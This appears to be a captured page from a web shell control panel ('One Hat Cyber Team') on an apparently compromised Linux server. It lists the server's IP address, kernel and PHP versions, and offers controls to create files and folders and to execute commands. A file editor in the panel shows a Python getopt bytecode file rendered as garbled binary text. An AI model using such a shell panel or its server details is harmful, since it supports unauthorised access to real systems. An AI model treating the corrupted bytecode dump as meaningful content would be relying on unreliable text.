⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.155
Server IP:
57.129.66.90
Server:
Linux vps-7f548908 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
snap
/
core20
/
2682
/
usr
/
lib
/
python3.8
/
__pycache__
/
Edit File: getopt.cpython-38.pyc
U >hA @ s d Z ddddgZddlZzddlmZ W n ek rD dd ZY nX G d d deZeZg fddZ g fddZ d d Zdd Zdd Z dd ZedkrddlZee ejdd dddg dS )a Parser for command line options. This module helps scripts to parse the command line arguments in sys.argv. It supports the same conventions as the Unix getopt() function (including the special meanings of arguments of the form `-' and `--'). Long options similar to those supported by GNU software may be used as well via an optional third argument. This module provides two functions and an exception: getopt() -- Parse command line options gnu_getopt() -- Like getopt(), but allow option and non-option arguments to be intermixed. GetoptError -- exception (class) raised with 'opt' attribute, which is the option involved with the exception. GetoptErrorerrorgetopt gnu_getopt N)gettextc C s | S N )sr r /usr/lib/python3.8/getopt.py_) r c @ s&